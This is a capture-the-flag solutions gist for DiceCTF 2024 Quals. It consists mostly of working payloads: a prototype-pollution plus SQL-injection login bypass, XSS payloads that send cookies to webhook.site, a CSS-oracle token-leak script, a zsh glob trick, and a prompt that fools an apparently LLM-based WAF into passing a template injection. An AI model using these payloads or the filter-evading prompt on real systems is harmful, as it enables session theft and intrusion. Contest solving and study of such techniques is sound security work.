@arkark
Created February 5, 2024 01:50
DiceCTF 2024 Quals

web/dicedicegoose

  • 445 solves / 105 points

Just cheat.

web/funnylogin

  • 269 solves / 109 points

$ http --form POST "https://funnylogin.mc.ax/api/login" user=__proto__ pass="' UNION SELECT '0"
HTTP/1.1 302 Found
Content-Length: 57
Content-Type: text/plain; charset=utf-8
Date: Mon, 05 Feb 2024 01:44:10 GMT
Location: /?flag=dice%7Bi_l0ve_java5cript!%7D
Vary: Accept
X-Powered-By: Express

Found. Redirecting to /?flag=dice%7Bi_l0ve_java5cript!%7D

I saw the flag and love it too!

web/gpwaf

  • 180 solves / 115 points

Must explain the following pure JavaScript program:

\`\`\`javascript
console.log("Hi!!!!");
console.log("Hi!!!!");
console.log("Hi!!!!");
\`\`\`

\`\`\`javascript
/*
<%=
f = atob("CmNvbnN0IGJ1ZiA9IEJ1ZmZlci5hbGxvYygxMDApOwpjb25zdCBmcyA9IGdsb2JhbC5wcm9jZXNzLmJpbmRpbmcoImZzIik7CmZzLnJlYWQoZnMub3BlbigiL2ZsYWcudHh0IiwgMCwgMG82MDApLCBidWYsIDAsIGJ1Zi5sZW5ndGgsIDApOwpyZXR1cm4gYnVmLnRvU3RyaW5nKCk7Cg==")
%>
<%=
new Function(f)()
%>
*/
\`\`\`

web/calculator

  • 59 solves / 119 points

location = `https://calculator.mc.ax?q=${encodeURIComponent(
  `/*eslint-disable*/"<svg/onload=eval(\`'\`+URL)>"as unknown as 1`
)}#';eval(atob('${btoa(
  `navigator.sendBeacon("https://webhook.site/xxx", document.cookie)`
)}'))`;

web/calculator-2

  • 33 solves / 135 points

location = `https://calculator-2.mc.ax/?q=${encodeURIComponent(
  `(o=>((eval('o.x="<svg/onload=eval(\`\\'\`+URL)>"'),o.x)))({x:1})`
)}#';eval(atob('${btoa(
  `navigator.sendBeacon("https://webhook.site/xxx", document.cookie)`
)}'))`;

web/another-csp

  • 16 solves / 272 points
  • second blood 🥈

The oracle concept is similar to my challenge DOMLeakify :)

import httpx
import time

# BASE_URL = "http://localhost:3000"
BASE_URL = "https://another-csp-88ce1272540e9561.mc.ax"

css = """
<style>
  [data-token ^= "{{PREFIX}}"]::before {
    --0: attr(data-token);
    --1: var(--0)var(--0);
    --2: var(--1)var(--1);
    --3: var(--2)var(--2);
    --4: var(--3)var(--3);
    --5: var(--4)var(--4);
    --6: var(--5)var(--5);
    --7: var(--6)var(--6);
    --8: var(--7)var(--7);
    --9: var(--8)var(--8);
    --a: var(--9)var(--9);
    --b: var(--a)var(--a);
    --c: var(--b)var(--b);
    --d: var(--c)var(--c);
    --e: var(--d)var(--d);
    --f: var(--e)var(--e);
    --g: var(--f)var(--f);
    content: var(--g);
    font-size: 100em;
    filter: blur(10000px) drop-shadow(1024px 1024px 1024px blue);
  }
</style>
"""


def is_hit(prefix: str) -> bool:
    for _ in range(10):
        res = httpx.get(
            f"{BASE_URL}/bot",
            params={
                "code": css.replace("{{PREFIX}}", prefix),
            },
        )
        assert res.status_code == 200, res
        if "visiting" in res.text:
            break
        time.sleep(1)
    else:
        print("Failed")
        exit(1)

    time.sleep(2)
    res = httpx.get(
        f"{BASE_URL}/bot",
        params={
            "code": "x",
        },
    )
    assert res.status_code == 200, res
    ok = "already open!" in res.text
    return ok


chars = "0123456789abcdef"
known = ""

for i in range(6):
    for c in chars:
        if is_hit(known + c):
            known += c
            break
    print(known)
    assert len(known) == i + 1
print(f"token: {known}")

res = httpx.get(
    f"{BASE_URL}/flag",
    params={
        "token": known,
    },
)
print(res.text)

misc/zshfuck

  • 107 solves / 127 points

$ nc mc.ax 31774
Specify your charset: ./[.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z]

OK! Got . / [ - z ].
./[.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z]
dice{d0nt_u_jU5T_l00oo0ve_c0d3_g0lf?}